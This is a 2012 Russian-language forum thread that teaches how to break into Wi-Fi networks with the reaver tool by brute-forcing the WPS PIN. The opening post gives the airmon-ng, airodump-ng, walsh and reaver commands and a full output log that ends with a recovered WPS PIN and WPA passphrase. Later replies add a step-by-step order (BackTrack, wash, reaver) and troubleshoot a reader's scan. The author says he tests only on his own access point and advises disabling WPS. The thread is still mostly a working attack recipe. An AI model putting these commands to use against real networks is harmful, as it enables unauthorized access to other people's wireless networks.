26.01.2012, 23:35
|
#1 (ссылка на пост)
|
Активный пользователь
Регистрация: 23.01.2012
Сообщений: 54
Информация
|
Поблагодарил: 3
Поблагодарили 17 раз в 11 сообщениях
|
|
Reaver. Взлом Wi-Fi сети
Всем привет!
Наконец то дошли руки до написания статьи по reaver. Но для начала давайте немного теории.
Wi-Fi Protected Setup (WPS) – стандарт, предназначенный для полуавтоматического создания беспроводной домашней сети, созданный Wi-Fi Alliance. Официально запущен 8 января 2007 года.
Целью протокола WPS является упрощение процесса настройки беспроводной сети, поэтому изначально он назывался Wi-Fi Simple Config. Протокол призван оказать помощь пользователям, которые не обладают широкими знаниями о безопасности в беспроводных сетях, и как следствие, имеют сложности при осуществлении настроек. WPS автоматически обозначает имя сети и задает шифрование, для защиты от несанкционированного доступа в сеть, при этом нет необходимости вручную задавать все параметры.
Push Button Configuration (PBC) – кнопка при нажатии которой осуществляется авто-поиск устройств с поддержкой WPS и дальнейшее подключение к точке доступа (AP).
Итак, для начала посмотрим, какие беспроводные интерфейсы имеются.
Переводим интерфейс wlan1 в режим монитора (monitor mode).
Код:
|
sudo airmon-ng start wlan1 |
После того как wi-fi интерфейс настроен, просмотрим wi-fi сети, которые находятся в зоне действия.
Код:
|
sudo airodump-ng mon0 |
Кстати, можно так же использовать программу walsh. Она позволяет просматривать точки доступа (AP), на которых включен WPS.
Код:
|
Scanning for supported APS...
BC:AE:C5:71:D3:17 hub-lex-AP
84:C9:B2:4C:E0:57 1-OJ
00:24:01:1B:1F:B3 more
F0:7D:68:40:46:DE Okean
00:14:D1:E2:06:94 TRENDnet651
14:D6:4D:B5:07:4C DomTar |
Закон нарушать мне не хочется, поэтому буду экспериментировать на своей AP.
Код:
|
sudo reaver -i mon0 -b BC:AE:C5:71:D3:17 -vv |
Код:
|
Reaver v1.3 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
[+] Waiting for beacon from BC:AE:C5:71:D3:17
[+] Associated with BC:AE:C5:71:D3:17 (ESSID: hub-lex-AP)
[+] 0.04% complete @ 2012-01-22 03:01:06 (5 seconds/attempt)
[+] 0.05% complete @ 2012-01-22 03:01:22 (6 seconds/attempt)
...
[+] 96.76% complete @ 2012-01-22 05:00:31 (4 seconds/attempt)
[+] 96.81% complete @ 2012-01-22 05:00:46 (4 seconds/attempt)
[+] 96.83% complete @ 2012-01-22 05:01:07 (4 seconds/attempt)
[+] 96.85% complete @ 2012-01-22 05:01:30 (4 seconds/attempt)
[+] 96.89% complete @ 2012-01-22 05:01:43 (4 seconds/attempt)
[+] 96.92% complete @ 2012-01-22 05:02:00 (4 seconds/attempt)
[+] 96.96% complete @ 2012-01-22 05:02:14 (4 seconds/attempt)
[+] 97.01% complete @ 2012-01-22 05:02:29 (4 seconds/attempt)
[+] 97.03% complete @ 2012-01-22 05:02:41 (4 seconds/attempt)
[+] 97.05% complete @ 2012-01-22 05:03:15 (4 seconds/attempt)
[+] 97.09% complete @ 2012-01-22 05:03:29 (4 seconds/attempt)
[+] 97.14% complete @ 2012-01-22 05:03:44 (4 seconds/attempt)
[+] WPS PIN: '31150545'
[+] WPA PSK: 'elNpTxD2uimQX2b/MpDKb0UL7[STPO?tIK5k.M(V"k?P7X;jrcx'
[+] AP SSID: 'hub-lex-AP' |
Как видите пароль был поставлен очень сложный, что не помешало добиться желаемого результата. Чтобы защититься от данного вида атаки, необходимо отключить службу WPS на роутере!
Вот и все. Как видите ничего сложного нет. Если возникнут вопросы, обращайтесь.
Последний раз редактировалось levinkv; 03.04.2012 в 18:19.
|
|
|
Эти 2 пользователя(ей) сказали Спасибо levinkv за это полезное сообщение:
|
|
|
11.02.2012, 02:56
|
#2 (ссылка на пост)
|
Продвинутый юзер
Регистрация: 22.06.2009
Адрес: Португалия, Украина
Сообщений: 124
|
А что такое WPS? Вид соединения из ряда WPA2/WPA? Если да, то в чём отличие от последних?
__________________
Asus maximus, RedLine на микронах 2х2GB 800MHz 3-3-3-3-10, Q6600 (G0) 2.4GHz (overlock 50% ) рабочая частота 3.6GHz, Водное охлаждение сам делал, raid 3х ST3500320AS ATA, creative SB X-Fi Xtreme Audio, GTX280 (overlock 24% ).
Создайте еще более понятный интерфейс и мир создаст еще более тупого юзера.
|
|
|
|
11.02.2012, 18:21
ТС
|
#3 (ссылка на пост)
|
Активный пользователь
Регистрация: 23.01.2012
Сообщений: 54
Информация
|
Поблагодарил: 3
Поблагодарили 17 раз в 11 сообщениях
|
|
Wi-Fi Protected Setup (WPS) – стандарт, предназначенный для полуавтоматического создания беспроводной домашней сети, созданный Wi-Fi Alliance. Официально запущен 8 января 2007 года.
Целью протокола WPS является упрощение процесса настройки беспроводной сети, поэтому изначально он назывался Wi-Fi Simple Config. Протокол призван оказать помощь пользователям, которые не обладают широкими знаниями о безопасности в беспроводных сетях, и как следствие, имеют сложности при осуществлении настроек. WPS автоматически обозначает имя сети и задает шифрование, для защиты от несанкционированного доступа в сеть, при этом нет необходимости вручную задавать все параметры.
|
|
|
Этот пользователь сказал Спасибо levinkv за это полезное сообщение:
|
|
|
13.03.2012, 06:14
|
#4 (ссылка на пост)
|
Продвинутый юзер
Регистрация: 22.06.2009
Адрес: Португалия, Украина
Сообщений: 124
|
Если не сложно, распиши пожалуйста что значат символы в строке
Код:
|
sudo reaver -i mon0 -b BC:AE:C5:71:D3:17 -vv |
(интересуют -i, -vv) Спасибо.
__________________
Asus maximus, RedLine на микронах 2х2GB 800MHz 3-3-3-3-10, Q6600 (G0) 2.4GHz (overlock 50% ) рабочая частота 3.6GHz, Водное охлаждение сам делал, raid 3х ST3500320AS ATA, creative SB X-Fi Xtreme Audio, GTX280 (overlock 24% ).
Создайте еще более понятный интерфейс и мир создаст еще более тупого юзера.
Последний раз редактировалось dqod; 13.03.2012 в 06:25.
|
|
|
|
13.03.2012, 23:07
|
#6 (ссылка на пост)
|
Продвинутый юзер
Регистрация: 22.06.2009
Адрес: Португалия, Украина
Сообщений: 124
|
Сегодня пробовал тестировать на точке друга по обоюдному согласию. Использовал сборку BackTrack 5 RC2 Возникли как всегда вопросы:
1) пришлось заболванить ось т.к. программа, по той ссылке которую ты кинул в другой своей теме на сайт backtrack c описанием как сделать запускаемую ось с флешки, поддерживает только BT 5 RC1 Так вот вопрос, не знаешь с флешки быстрее будет работать чем с болванки? Если да, то я лучше RC1 скачаю и запишу на флешку.
2) walsh:
а) я в BT 5 RC2 его не нашёл, он входит в RC1 или надо Linux ставить что бы им пользоваться?
b) он показывает только те точки которые работают по протоколу WPS или показывает все, но WPS отдельно обозначает?
__________________
Asus maximus, RedLine на микронах 2х2GB 800MHz 3-3-3-3-10, Q6600 (G0) 2.4GHz (overlock 50% ) рабочая частота 3.6GHz, Водное охлаждение сам делал, raid 3х ST3500320AS ATA, creative SB X-Fi Xtreme Audio, GTX280 (overlock 24% ).
Создайте еще более понятный интерфейс и мир создаст еще более тупого юзера.
|
|
|
|
13.03.2012, 23:34
ТС
|
#7 (ссылка на пост)
|
Активный пользователь
Регистрация: 23.01.2012
Сообщений: 54
Информация
|
Поблагодарил: 3
Поблагодарили 17 раз в 11 сообщениях
|
|
1. конечно с флешки быстрее, у нее скорость считывания гораздо выше, чем у болванки
2. walsh был, когда reaver был версии 1.3; теперь reaver 1.4 и walsh переименован в wash
порядок действий такой:
1. качаешь BT5 R2
2. грузишь на флешку
3. запускаешь wash, чтобы просканировать AP в радиусе действия на наличие WPS
4. запускаешь reaver
будут вопросы пиши, отвечу.
|
|
|
|
27.11.2012, 09:12
|
#8 (ссылка на пост)
|
Ламер
Регистрация: 27.11.2012
Сообщений: 2
Информация
|
Поблагодарил: 0
Поблагодарили 0 раз в 0 сообщениях
|
|
Цитата:
|
WPA PSK: 'elNpTxD2uimQX2b/MpDKb0UL7[STPO?tIK5k.M(V"k?P7X;jrcx'
|
что это?
|
|
|
|
27.11.2012, 20:35
|
#9 (ссылка на пост)
|
Инквизитор
Регистрация: 29.01.2008
Адрес: Омск
Сообщений: 2,304
|
Пароль
|
|
|
Этот пользователь сказал Спасибо MiraMaX166 за это полезное сообщение:
|
|
|
27.11.2012, 22:52
|
#10 (ссылка на пост)
|
Ламер
Регистрация: 27.11.2012
Сообщений: 2
Информация
|
Поблагодарил: 0
Поблагодарили 0 раз в 0 сообщениях
|
|
попробовал поискать точки WPS. запнулся вот на чем:
Цитата:
|
root@bt:~# wash -i mon0
Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
BSSID Channel RSSI WPS Version WPS Locked ESSID
---------------------------------------------------------------------------------------------------------------
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...
|
|
|
|
|
Ваши права в разделе
|
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения
HTML код Выкл.
|
|
|
Текущее время: 18:24. Часовой пояс GMT +6.
|
|